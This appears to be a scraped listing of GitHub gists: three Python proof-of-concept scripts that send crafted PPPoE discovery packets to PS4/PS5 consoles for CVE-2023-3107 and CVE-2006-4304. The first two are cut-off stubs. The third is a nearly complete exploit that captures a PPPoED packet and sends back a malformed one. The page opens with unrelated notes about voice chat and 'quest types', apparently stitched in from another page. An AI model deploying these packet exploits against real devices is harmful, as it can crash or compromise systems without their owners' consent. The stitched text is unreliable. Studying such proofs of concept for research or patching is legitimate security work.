Note
This no longer works in browser!
This no longer works if you're alone in vc! Somebody else has to join you!
Warning
There are now two quest types ("stream" and "play")! Pay attention to the instructions!
lewiwiii
/ PoC of CVE-2023-3107 for PS4.py
Last active
April 10, 2024 10:41
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This software is licensed under the GNU Affero General Public License (AGPL) version 3.0 or later. | |
| # For more details, see <https://www.gnu.org/licenses/agpl-3.0.html>. | |
| from scapy import all as sp | |
| import sys | |
| import random as rn | |
| iface = sys.argv[1] | |
| src_mac = sp.get_if_hwaddr(iface) |
iMrDJAi
/ CVE-2006-4304.py
Last active
May 5, 2024 01:22
My implementation of a proof of concept for the `CVE-2006-4304` sppp driver vulnerability that affected PS4/PS5 and earlier versions of FreeBSD/NetBSD
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from scapy.all import sniff, sendp | |
| from socket import * | |
| import time | |
| # Replace with your PS4/5's MAC address. | |
| dst_mac=b'\xaa\xbb\xcc\xdd\xee\xff' | |
| # Replacing source MAC address is not mandatory | |
| src_mac= b'\xab\xcd\xef\xab\xcd\xef' | |
| # Replace this with your computer's ethernet interface name | |
| iface_name = 'Ethernet' |
RobbedColek
/ PS4-PS5-CVE-2006-4304.py
Created
January 30, 2024 16:02
PoC of CVE-2006-4304 for PS4/PS5
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from scapy.all import PPPoED, Ether, sniff, sendp, srp1, hexdump | |
| source = b"\xXX\xXX\xXX\xXX\xXX\xXX" # MAC address of your adapter on PC | |
| destination = b"\xXX\xXX\xXX\xXX\xXX\xXX" # MAC address of LAN on your PS4 | |
| interface = "Realtek PCIe 2.5GbE Family Controller #2" # get via "ipconfig /all" or eth0 or similiar on Linux | |
| packet = sniff(iface=interface, filter="pppoed", count=1) | |
| tag_value = packet[PPPoED][0].tag_list[1].tag_value | |
| payload = destination + source + b"\x88\x63\x11\x07\x00\x00\x00\x0c\x01\x03\x00\x08" + tag_value | |
| sendp(payload, iface=interface) |